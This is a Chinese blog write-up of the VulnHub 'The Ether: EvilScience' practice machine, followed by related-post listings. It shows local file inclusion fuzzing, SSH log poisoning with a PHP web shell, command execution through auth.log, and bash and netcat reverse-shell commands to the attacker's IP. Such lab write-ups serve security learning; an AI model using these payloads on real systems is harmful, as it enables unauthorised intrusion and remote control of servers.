Vulnhub-theEther

最新推荐文章于 2024-08-02 20:15:34 发布
最新推荐文章于 2024-08-02 20:15:34 发布
阅读量1k 收藏
点赞数
分类专栏: Vulnhub 文章标签: 网络安全 web安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/m0_52016680/article/details/127777547
版权

一、IP探测

 arp-scan -l

 

靶机IP为172.20.10.3

二、端口扫描

 nmap -sV -T4 -p- -A 172.20.10.3

 

只开放了80端口。

三、端口分析(80端口)

 

这里有一个参数,可以包含本地文件。这是一个可以利用的点。其他的就没有找到什么了。

四、漏洞利用

这个参数可以爆破一下后台文件。

可以先用dirb试试。

 dirb http://172.20.10.3

扫到了一些路径但基本都是index,没什么用。

要用参数爆破,利用burpsuite的intruder模块爆破file参数。

 

选用LFI的字典

字典链接:https://github.com/danielmiessler/SecLists

字典名为LFI-Jhaddix.txt

 

 

前几个是访问成功的,可以看到是日志文件。

auth.log的状态码是302,有重定向。点击查看数据包。

可以看到日志,因此可以考虑日志注入,也就是通过执行命令然后在日志中查看操作及对应结果。

先通过ssh注入一段php代码

 ssh '<?php system($_GET[cmd]);?>'@172.20.10.3

 

密码随便填

然后查看日志

可以通过curl命令查询。

 curl http://http://172.20.10.3/?file=/var/log/auth.log

 

发现了这条ssh连接记录,但是用户名被隐藏了。

 curl 'http://172.20.10.3/index.php?file=/var/log/auth.log&cmd=ls'

 

看到了ls的结果,说明可以RCE。

构造payload反弹shell。

 #新开一个终端然后输入以下命令
 nc -lvvp 1234
 #即监听1234端口

在原终端中输入

 curl 'http://172.20.10.3/index.php?file=/var/log/auth.log&cmd=bash -i >& /dev/tcp/172.20.10.2/1234 0>&1'

 

需要url编码。

 curl 'http%3A%2F%2F172.20.10.3%2Findex.php%3Ffile%3D%2Fvar%2Flog%2Fauth.log%26cmd%3Dbash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F172.20.10.2%2F1234%200%3E%261'

还是不行,可能是这种反弹方法有问题。换一个反弹方法

 mknod backpipe p && nc 172.20.10.2 1234 0<backpipe | /bin/bash 1>backpipe

进行url编码然后加上curl命令

 curl 'http://172.20.10.3/index.php?file=/var/log/auth.log&cmd=mknod+backpipe+p+%26%26+nc+172.20.10.2+1234+0%3Cbackpipe+%7C+%2Fbin%2Fbash+1%3Ebackpipe'

 

 

后续由于笔者的环境出现了问题,换到了另一台电脑上进行了后续操作。没有截图,只能口述了。。。

后续打开xxxlogauditorxxx.py的脚本,发现特别长。

尝试运行一下

输入命令

 /var/log/auth.log | ls /root

看到了一个flag.png的文件,复制到公共目录temp用wget命令下载下来。

打开发现不是,用cat命令查看看到base64编码,解码一下就是flag。

The Ether: Evil Science靶机渗透测试
weixin_58786230的博客
08-08 458
【代码】The Ether: Evil Science靶机渗透测试。
The Ether: Evil Science靶机
最新发布
zdd1453691081的博客
08-05 318
【代码】The Ether: Evil Science靶机。
vulnhub】The Ether: Evil Science靶机
wbplife的博客
08-02 412
发现有一个/var/log/auth.log目录存在重定向,打开响应包,里面是日志记录,并且是ssh的记录,应该是会把ssh操作记录到这里面,我们尝试利用ssh写入一句话木马,点击各处之后,发下在点击上面的ABOUT US之后,url里有着请求参数:/index.php?利用前面的漏洞执行远程下载和运行,将下面的每条命令在网页里拼接在URL参数后面,回车执行就可以,继续下一条命令。对可能存在文件包含漏洞的页面进行burp抓包,对file参数后面进行文件爆破。拼接目录扫描出的目录,没有什么有用的信息,
Vulnhub靶场渗透-theEther
paidx0
10-03 1354
前言 这次的靶机还是很好玩的,有点难度折腾了挺久,但方法对了那就很容易了 靶机ip(192.168.110.129) 攻击机ip(192.168.110.127) 网络NAT模式 不废话了直接开始 信息收集 打开网页简单看了看,没有过多的内容,是个基因的论文网站 网站没有太多的功能,而且扫目录也没扫到什么有价值的东西 最开始以为网站上的这些单词可能会用到,就利用他们做了个字典去爆破 ssh,显然我的方法就是错的 漏洞挖掘 注意到这个位置很有可能是利用存在读文件,简单尝试了几次Apache的日志文件
VulnHub-The Ether: EvilScience (v1.0.1)渗透学习
我是小小白的博客
07-09 803
VulnHub-The Ether: EvilScience (v1.0.1)渗透学习 前言 靶机地址:https://download.vulnhub.com/lazysysadmin/Lazysysadmin.zip 靶机难度:中级(CTF) 靶机发布日期:2017 年 1030 日 靶机描述:最近,我一直喜欢为安全社区创造黑客挑战。这一新挑战囊括了一家名为 The Ether 的公司,该公司宣布了一种显着改变人类福利的灵丹妙药。由于他们正在开发的产品的性质,CDC 对这个群体产生了怀疑。 目标:
Vulnhub 渗透练习(八)—— THE ETHER: EVILSCIENCE
shinygod的博客
02-19 732
本地文件包含:利用 ssh 登录产生错误日志写入一句话木马(ssh ''@ip)seclists 字典:https://github.com/danielmiessler/SecListssudo -l。
k8s集群部署
OPS_akai的博客
01-06 757
架构: 节点规划: 172.20.10.2 master01 172.20.10.3 master02 172.20.10.4 master03 172.20.10.5 node01 172.20.10.100 k8s-lb 基础环境信息: 系统: cento-7.4 软件: kubenetes-1.18.0 Docker-20.10.8 基础环境配置: 1. 配置主机名---所有master和node节点 hostnamectl set-hostname master01 hostnamectl set
分布式系统原理实验报告
laionly的博客
09-29 1140
分布式系统原理实验报告 一、实验目的 Linux 是一套免费使用和自由传播的类 Unix 操作系统,是一个基于 POSIX 和 UNIX 的多用户、多任务、支持多线程和多 CPU 的操作系统。它能运行主要的 UNIX 工具软件、应用程序和网络协议。它支持 32 位和 64 位硬件。Linux 继承了 Unix 以网络为核心的设计思想,是一个性能稳定的多用户网络操作系统。本次实验意 图通过实...
CentOS7-搭建-Vulhub靶场(安装包方式)
剁椒鱼头没剁椒的博客
02-08 2991
Vulhub:是一个面向大众的开源漏洞靶场,无需docker知识,仅需要执行两条简单的命令即可编译、运行一个完整的漏洞靶场镜像。让漏洞复现更加简单,让入门小白可以更加专注于漏洞本身。
Stapler:1 靶机渗透测试-Vulnhub(STAPLER: 1
m0_68117643的博客
08-01 1985
该靶机(stapler:1)直接导入Vmware无法使用,可先使用VirtualBox打开后再导出虚拟机,使用Vmware打开即可。 思路:12380端口扫描—wpscan爆破用户名——文件包含漏洞利用——修改管理员账户密码——上传webshell——sudo提权......
kali vulhub的使用方法
菜菜的博客
06-16 1764
vulhub是一个 docker 和 docker-compose 的漏洞环境集合,命令执行的漏洞环境。花了7749秒学习,3分钟教会你
STC15单片机-无线通讯(WIFI模块)
weixin_46251230的博客
09-04 8269
ESP8266 系列模组是深圳市安信可科技有限公司开发的一系列基于乐鑫ESP8266EX的低功耗UART-WiFi芯片模组,可以方便地进行二次开发,接入云端服务,实现手机3/4G全球随时随地的控制,加速产品原型设计。模块核心处理器 ESP8266 在较小尺寸封装中集成了业界领先的 Tensilica L106 超低功耗 32 位微型 MCU,带有 16 位精简模式,主频支持 80 MHz 和 160 MHz,支持 RTOS,集成 Wi-Fi MAC/ BB/RF/PA/LNA,板载天线。支持标准的 IEEE
LINUX | 如何开放vultr的端口
weixin_43568232的博客
11-19 5558
一、首先检查某端口是否开启: firewall-cmd --query-port=80/tcp --zone=public #查询80端口是否开启,自行修改端口号 返回no即未开启,显示yes为已开启。 二、开启某端口代码 firewall-cmd --zone=public --add-port=80/tcp --permanent #添加80端口,如需添加其他端口,自行修改端口号 修改完成后需要重启服务器才能生效。 三、如果出现FirewallD is not running 1.查看防
Struts2远程代码执行漏洞(CVE-2020-17530) 复现及排查
dayouzi的博客
08-15 1980
Struts2是一个基于MVC设计模式的Web应用框架,它本质上相当于一个servlet,在MVC设计模式中,Struts2作为控制器(Controller)来建立模型与视图的数据交互。CVE-2020-17530是对CVE-2019-0230的绕过,Struts2官方对CVE-2019-0230的修复方式是加强OGNL表达式沙盒,而CVE-2020-17530绕过了该沙盒。在特定的环境下,远程攻击者通过构造恶意的OGNL表达式,可造成任意代码执行。
Vultr VPS开放HTTP端口
你好! 我是Jins
10-11 4294
配置Vultr的VPS服务器的端口开放
除了22端口其他都不能访问
热门推荐
hello,是翠花呀
09-04 1万+
问题描述:在控制台内打开了允许访问的端口,但仍然是关闭状态。 测试端口是否开启:https://www.yougetsignal.com/tools/open-ports/ http://tool.chinaz.com/port 可参照 https://blog.csdn.net/qq_38401919/article/details/80824432 博客查验 1.端口添加到防火墙列表 vi...
查看端口命令
wenhui 的博客
04-19 6628
查看端口命令 查看端口占用:netstat -ano | findstr 502 C:\Users\Administrator>netstat -ano | findstr 502 TCP 0.0.0.0:502 0.0.0.0:0 LISTENING 3764 TCP 127.0.0.1:502 12...
带妹玩转Vulnhub【九】
BadRer的博客
10-03 531
前言 国庆第三天,早上感觉回到了最初的起点!
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值